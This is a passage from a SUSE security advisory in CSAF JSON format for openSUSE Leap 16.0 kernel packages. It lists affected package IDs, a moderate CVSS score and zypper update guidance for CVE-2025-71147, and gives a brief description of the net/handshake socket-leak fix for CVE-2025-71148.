"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: restore destructor on submit failure\n\nhandshake_req_submit() replaces sk-\u003esk_destruct but never restores it when\nsubmission fails before the request is hashed. handshake_sk_destruct() then\nreturns early and the original destructor never runs, leaking the socket.\nRestore sk_destruct on the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
